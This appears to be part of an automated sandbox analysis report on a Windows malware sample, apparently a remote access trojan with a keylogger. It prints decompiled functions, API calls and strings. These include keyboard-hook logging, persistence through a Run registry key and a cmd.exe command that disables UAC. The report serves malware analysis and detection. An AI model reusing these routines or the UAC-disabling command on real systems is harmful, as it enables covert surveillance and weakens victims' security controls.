                                  0x00412896
                                  0x00412897
                                  0x0041289b
                                  0x004128a1
                                  0x004128a3
                                  0x004128a9
                                  0x004128ab
                                  0x004128b5
                                  0x004128ba
                                  0x004128bd
                                  0x004128c3
                                  0x004128cb
                                  0x004128ce
                                  0x004128d9
                                  0x004128df
                                  0x004128e6
                                  0x004128f3
                                  0x004128fc
                                  0x00412909

                                  APIs
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                  • ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                  • ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$??0?$basic_string@D@2@@std@@D@std@@$??1?$basic_string@??2@??3@?c_str@?$basic_string@?length@?$basic_string@G@1@@V01@@
                                  • String ID:
                                  • API String ID: 391609400-0
                                  • Opcode ID: c177d2df2063bbdc2060a0222ce48b64abd3706d1ceb561fbd7f54770638c6aa
                                  • Instruction ID: aeeabeca61c13fa181a61ba6e56d16b1543aaa328dd705508f0d2aa2ccd85a4a
                                  • Opcode Fuzzy Hash: c177d2df2063bbdc2060a0222ce48b64abd3706d1ceb561fbd7f54770638c6aa
                                  • Instruction Fuzzy Hash: A50180326005199B8B08EF68EC958EFB7EAFB88255744443EF907C7390DE709A05CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00413B0F, Relevance: 10.6, APIs: 7, Instructions: 55windowstringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 28%
                                  			E00413B0F() {
				struct tagMSG _v32;
				char _v292;
				int _t15;

				GetModuleFileNameA(0,  &_v292, 0x104);
				 *0x41c204 = E00413BC8();
				0x41c200->cbSize = 0x58;
				 *0x41c208 = 1;
				 *0x41c210 = 0x401;
				 *0x41c214 = ExtractIconA(0,  &_v292, 0);
				lstrcpynA(0x41c218,  *0x41b160, 0x40);
				 *0x41c20c = 7;
				Shell_NotifyIconA(0, 0x41c200);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v32);
				while(1) {
					_t15 = GetMessageA();
					if(_t15 == 0) {
						break;
					}
					TranslateMessage( &_v32);
					DispatchMessageA( &_v32);
					_push(0);
					_push(0);
					_push(0);
					_push( &_v32);
				}
				return _t15;
			}






                                  0x00413b29
                                  0x00413b34
                                  0x00413b42
                                  0x00413b4c
                                  0x00413b56
                                  0x00413b68
                                  0x00413b78
                                  0x00413b84
                                  0x00413b8e
                                  0x00413b9a
                                  0x00413b9b
                                  0x00413b9f
                                  0x00413ba0
                                  0x00413ba1
                                  0x00413ba1
                                  0x00413ba5
                                  0x00000000
                                  0x00000000
                                  0x00413bab
                                  0x00413bb5
                                  0x00413bbb
                                  0x00413bbc
                                  0x00413bc0
                                  0x00413bc1
                                  0x00413bc1
                                  0x00413bc7

                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00413B29
                                    • Part of subcall function 00413BC8: RegisterClassExA.USER32(00000030), ref: 00413C0E
                                    • Part of subcall function 00413BC8: CreateWindowExA.USER32 ref: 00413C29
                                    • Part of subcall function 00413BC8: GetLastError.KERNEL32(?,00000000), ref: 00413C33
                                  • ExtractIconA.SHELL32(00000000,?,00000000), ref: 00413B60
                                  • lstrcpynA.KERNEL32(0041C218,00000040), ref: 00413B78
                                  • Shell_NotifyIconA.SHELL32(00000000,0041C200), ref: 00413B8E
                                  • GetMessageA.USER32 ref: 00413BA1
                                  • TranslateMessage.USER32(?), ref: 00413BAB
                                  • DispatchMessageA.USER32 ref: 00413BB5
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                  • String ID:
                                  • API String ID: 1970332568-0
                                  • Opcode ID: 5db49f3c559ac23c5e5b4a4de78144058b1f4a1bd7bc86c7a9fc6dac82a1e8bb
                                  • Instruction ID: 0139c5569a5099b89989dc8841d294567b871d20cbef476d366633a748243c7d
                                  • Opcode Fuzzy Hash: 5db49f3c559ac23c5e5b4a4de78144058b1f4a1bd7bc86c7a9fc6dac82a1e8bb
                                  • Instruction Fuzzy Hash: DA1121B2841215BBD7109BD1EC4CEDB3BBCEB49351F008166B615D2051D7B89545CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405D50, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 49COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Stopped,?,0041BCB0,?,?,004054E4), ref: 00405D76
                                    • Part of subcall function 00405DD3: GetLocalTime.KERNEL32(?,73B743E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                    • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                    • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                    • Part of subcall function 00405DD3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                    • Part of subcall function 00405DD3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                    • Part of subcall function 00405DD3: malloc.MSVCRT ref: 00405E37
                                    • Part of subcall function 00405DD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                    • Part of subcall function 00405DD3: sprintf.MSVCRT ref: 00405E69
                                    • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                    • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                    • Part of subcall function 00405DD3: SetEvent.KERNEL32(00000000), ref: 00405E95
                                    • Part of subcall function 00405DD3: free.MSVCRT(00000000), ref: 00405E9C
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Stopped,?,0041BCB0,?,?,004054E4), ref: 00405D8D
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 00405DA1
                                  • UnhookWindowsHookEx.USER32(00000000), ref: 00405DC0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@V01@$D@2@@0@Hstd@@V?$basic_string@Y?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@EventHookLocalTimeUnhookV01@@V10@V10@@Windowsfreemallocsprintf
                                  • String ID: Offline Keylogger Stopped$[INFO]
                                  • API String ID: 2222684746-1731565019
                                  • Opcode ID: 73c64669d0e90f52680bcd42a3afb3a3acb1e5eb000d97594ebbd2d1d962b6da
                                  • Instruction ID: e64c4fb295ac971b427419d3758f0b97408fd66a05d8179c7aec1af0dcca75a5
                                  • Opcode Fuzzy Hash: 73c64669d0e90f52680bcd42a3afb3a3acb1e5eb000d97594ebbd2d1d962b6da
                                  • Instruction Fuzzy Hash: 0C01D674910B046BE7107725C84D7FB7EBCDF81750F44846BE842922C1D7B869458FAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B7B9, Relevance: 10.5, APIs: 7, Instructions: 42registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 28%
                                  			E0040B7B9(void* _a4, void* _a8, short* _a12, void* _a16, int _a32) {
				long _t15;
				long _t18;
				void* _t21;
				int _t22;
				void* _t28;

				_t15 = RegCreateKeyW(_a4, _a8,  &_a8);
				if(_t15 != 0) {
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					return 0;
				} else {
					__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ(_t28, _t21);
					_t17 = _t15 + _t15 + 2;
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t22 = 0;
					_t18 = RegSetValueExW(_a8, _a12, 0, _a32, _t15 + _t15 + 2, _t17);
					RegCloseKey(_a8);
					if(_t18 == 0) {
						_t22 = 1;
					}
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					return _t22;
				}
			}








                                  0x0040b7c6
                                  0x0040b7ce
                                  0x0040b81f
                                  0x0040b828
                                  0x0040b7d0
                                  0x0040b7d5
                                  0x0040b7db
                                  0x0040b7e3
                                  0x0040b7ea
                                  0x0040b7f6
                                  0x0040b801
                                  0x0040b809
                                  0x0040b80b
                                  0x0040b80b
                                  0x0040b810
                                  0x0040b81b
                                  0x0040b81b

                                  APIs
                                  • RegCreateKeyW.ADVAPI32(?,80000002,80000002), ref: 0040B7C6
                                  • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00415628,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,0041BA28), ref: 0040B7D5
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,0041BA28), ref: 0040B7E3
                                  • RegSetValueExW.ADVAPI32(80000002,00407E26,00000000,?,00000000,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24), ref: 0040B7F6
                                  • RegCloseKey.ADVAPI32(80000002,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,0041BA28), ref: 0040B801
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,0041BA28,00415A24), ref: 0040B810
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,0041BA28,00415A24), ref: 0040B81F
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: G@2@@std@@G@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@CloseCreateValue
                                  • String ID:
                                  • API String ID: 1037601705-0
                                  • Opcode ID: e47ed06fcfe4702c07f1ce527c0755a331d7201bc4fedc9c1fec415c236eba45
                                  • Instruction ID: 16de392092bcd2de4e66c717f3c3c884efc51066479430e04c8b01777f2a524b
                                  • Opcode Fuzzy Hash: e47ed06fcfe4702c07f1ce527c0755a331d7201bc4fedc9c1fec415c236eba45
                                  • Instruction Fuzzy Hash: 4501A87204050DEFCF00AFA0EC998EA7B6DFB583597458035FD1996161D7329E14DBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040A0E1, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 39processCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 50%
                                  			E0040A0E1() {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOA _v88;
				signed int _t17;

				_t17 = 0x11;
				memset( &_v88, 0, _t17 << 2);
				_v88.cb = 0x44;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				CreateProcessA("C:\\Windows\\System32\\cmd.exe", "/k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f", 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20);
				CloseHandle(_v20);
				return CloseHandle(_v20.hThread);
			}






                                  0x0040a0ed
                                  0x0040a0f1
                                  0x0040a0f6
                                  0x0040a0fd
                                  0x0040a0fe
                                  0x0040a0ff
                                  0x0040a100
                                  0x0040a11f
                                  0x0040a12e
                                  0x0040a138

                                  APIs
                                  • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?,0041BA38,0041BCB0), ref: 0040A11F
                                  • CloseHandle.KERNEL32(?), ref: 0040A12E
                                  • CloseHandle.KERNEL32(?), ref: 0040A133
                                  Strings
                                  • C:\Windows\System32\cmd.exe, xrefs: 0040A11A
                                  • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040A115
                                  • D, xrefs: 0040A0F6
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandle$CreateProcess
                                  • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe$D
                                  • API String ID: 2922976086-1747066916
                                  • Opcode ID: 34e80a7266f22886247dd1c59806a28bf3f5ead1ecfd7117f941ad378ce73be4
                                  • Instruction ID: 0928101be9c5a4b5cd6cbd2924aec545eff454ae04b53be068f3b7a54285d6aa
                                  • Opcode Fuzzy Hash: 34e80a7266f22886247dd1c59806a28bf3f5ead1ecfd7117f941ad378ce73be4
                                  • Instruction Fuzzy Hash: 5EF054B2A00518BEFB019BE8DC05EFFBB7DE784700F114436FA11F6060D6746D088AA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004127F5, Relevance: 10.5, APIs: 7, Instructions: 31COMMON
                                  Download Yara Rule
                                  APIs
                                  • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,0040464E,?,?,00000055), ref: 00412804
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041280E
                                  • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,0040464E,?,?,00000055), ref: 00412817
                                  • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 00412821
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041282B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,00000055), ref: 00412841
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000055), ref: 0041284A
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@2@@std@@G@std@@$??0?$basic_string@?begin@?$basic_string@$??1?$basic_string@?end@?$basic_string@?length@?$basic_string@D@1@@V01@@
                                  • String ID:
                                  • API String ID: 2478582372-0
                                  • Opcode ID: f35f0c3dd271747c8617ee2a79da0f1b075a0c74f27328e3a593d3adc6a0a34e
                                  • Instruction ID: 9f96166dac4781290f3bd34c47d79f1531a5159583b3a655759a1da2a24b60ea
                                  • Opcode Fuzzy Hash: f35f0c3dd271747c8617ee2a79da0f1b075a0c74f27328e3a593d3adc6a0a34e
                                  • Instruction Fuzzy Hash: 50F0F97590060EEBCF04EFA0DD5D9EE7B78AF84349B008024F90697290DA70AA09CF65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412795, Relevance: 10.5, APIs: 7, Instructions: 31COMMON
                                  Download Yara Rule
                                  APIs
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                  • ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                  • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$D@2@@std@@D@std@@$??0?$basic_string@?begin@?$basic_string@$??1?$basic_string@?end@?$basic_string@?length@?$basic_string@G@1@@V01@@
                                  • String ID:
                                  • API String ID: 914748455-0
                                  • Opcode ID: 071d9129cc4c15a7588e784708c8bfb61fe96f0cebcdac03ffdaa68953a5de9b
                                  • Instruction ID: f669f26280469c21e485b93068b71aa9fa6b13bd9f3a6efc1e343f131735dcea
                                  • Opcode Fuzzy Hash: 071d9129cc4c15a7588e784708c8bfb61fe96f0cebcdac03ffdaa68953a5de9b
                                  • Instruction Fuzzy Hash: 08F0A97690450EEBCB04EFA0ED5DDEE7B78EB84305B048065F906972A0DA74AA09CF65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412DDF, Relevance: 9.0, APIs: 6, Instructions: 48fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E00412DDF(void _a4, void* _a8) {
				struct _OVERLAPPED* _t13;
				void* _t16;
				long _t17;
				void* _t19;

				_t13 = 0;
				_t19 = CreateFileW(_a4, 0x80000000, 3, 0, 3, 0x80, 0);
				if(_t19 != 0xffffffff) {
					_t17 = GetFileSize(_t19, 0);
					__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXID@Z(_t17, 0, _t16);
					_t8 =  &_a4;
					_a4 = 0;
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					if(ReadFile(_t19,  &_a4, _t17, _t8, 0) != 0) {
						_t13 = 1;
					}
					CloseHandle(_t19);
					return _t13;
				}
				return 0;
			}







                                  0x00412de3
                                  0x00412dff
                                  0x00412e04
                                  0x00412e16
                                  0x00412e1a
                                  0x00412e23
                                  0x00412e29
                                  0x00412e2c
                                  0x00412e3d
                                  0x00412e3f
                                  0x00412e3f
                                  0x00412e42
                                  0x00000000
                                  0x00412e48
                                  0x00000000

                                  APIs
                                  • CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,00409C9F,00000000), ref: 00412E0D
                                  • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXID@Z.MSVCP60(00000000,00000000,?,?,00409C9F,00000000), ref: 00412E1A
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,00000000,?,?,00409C9F,00000000), ref: 00412E2C
                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00409C9F,00000000), ref: 00412E34
                                  • CloseHandle.KERNEL32(00000000,?,00409C9F,00000000), ref: 00412E42
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: File$D@2@@std@@D@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@?resize@?$basic_string@CloseCreateHandleReadSize
                                  • String ID:
                                  • API String ID: 2061410294-0
                                  • Opcode ID: fa4d467d17345bb80924ef3185be0a48566cc4f8ae095e8dcd31704ebaf267b8
                                  • Instruction ID: e286a7eceb6258eec42f82ecdc09f82327f8599071822df4e1fbbe5006a6f2d0
                                  • Opcode Fuzzy Hash: fa4d467d17345bb80924ef3185be0a48566cc4f8ae095e8dcd31704ebaf267b8
                                  • Instruction Fuzzy Hash: EBF08171241518BFEB125F60EC88FFB7B6CEB867A4F108126FD15D6290CA744E418668
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00413BC8, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 71%
                                  			E00413BC8() {
				char _v20;
				struct _WNDCLASSEXA _v68;
				struct HWND__* _t21;
				signed int _t23;

				_t23 = 0xb;
				memset( &(_v68.style), 0, _t23 << 2);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				_v68.cbSize = 0x30;
				asm("movsb");
				_v68.lpszClassName =  &_v20;
				_v68.style = 0;
				_v68.lpfnWndProc = E00413C3F;
				_v68.cbClsExtra = 0;
				_v68.cbWndExtra = 0;
				_v68.lpszMenuName = 0;
				if(RegisterClassExA( &_v68) == 0) {
					L3:
					return 0;
				}
				_t21 = CreateWindowExA(0,  &_v20, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, 0, 0);
				if(_t21 == 0) {
					GetLastError();
					goto L3;
				}
				return _t21;
			}







                                  0x00413bd4
                                  0x00413bd8
                                  0x00413be2
                                  0x00413be3
                                  0x00413be4
                                  0x00413be5
                                  0x00413bea
                                  0x00413bf1
                                  0x00413bf2
                                  0x00413bfb
                                  0x00413bfe
                                  0x00413c05
                                  0x00413c08
                                  0x00413c0b
                                  0x00413c17
                                  0x00413c39
                                  0x00000000
                                  0x00413c39
                                  0x00413c29
                                  0x00413c31
                                  0x00413c33
                                  0x00000000
                                  0x00413c33
                                  0x00413c3e

                                  APIs
                                  • RegisterClassExA.USER32(00000030), ref: 00413C0E
                                  • CreateWindowExA.USER32 ref: 00413C29
                                  • GetLastError.KERNEL32(?,00000000), ref: 00413C33
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: ClassCreateErrorLastRegisterWindow
                                  • String ID: 0$MsgWindowClass
                                  • API String ID: 2877667751-2410386613
                                  • Opcode ID: c722dd2e6d169ed387903e3056205791a775bb0513f46e273fb6c6412d1be798
                                  • Instruction ID: 7311bfe71f6f07f925a5bea5fd399074fa81e1952be4f1bddfc29815928cdf0b
                                  • Opcode Fuzzy Hash: c722dd2e6d169ed387903e3056205791a775bb0513f46e273fb6c6412d1be798
                                  • Instruction Fuzzy Hash: D5019A72C00228AACB21CF91EC08ADFBFB9EF45761B004026F410B6240D7B05606CAE4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004032B3, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0040B522: RegOpenKeyExA.KERNEL32(?,80000002,00000000,00020119,80000002,00000000), ref: 0040B551
                                    • Part of subcall function 0040B522: RegQueryValueExA.KERNEL32(80000002,004140D8,00000000,00000000,?,00000400), ref: 0040B56E
                                    • Part of subcall function 0040B522: RegCloseKey.ADVAPI32(80000002), ref: 0040B577
                                    • Part of subcall function 0040B522: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040B596
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,0041BCB0,0040310B,0041BA38,0041BCB0,00000000), ref: 004032DA
                                  • atoi.MSVCRT ref: 004032E1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,0041BCB0,0040310B,0041BA38,0041BCB0,00000000), ref: 004032ED
                                  Strings
                                  • SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 004032C1
                                  • CurrentBuildNumber, xrefs: 004032BC
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@?c_str@?$basic_string@CloseD@1@@OpenQueryValueatoi
                                  • String ID: CurrentBuildNumber$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                  • API String ID: 1453687294-3377751560
                                  • Opcode ID: 11ba8fd773ccb4f0d3c70d753f9be5e0adae2c01f6dbf8595f5c6f89531c0230
                                  • Instruction ID: fd2564c0d0cdcb3147c4efd585e8939db476c869aa5c4bae27b80d41888a3fe0
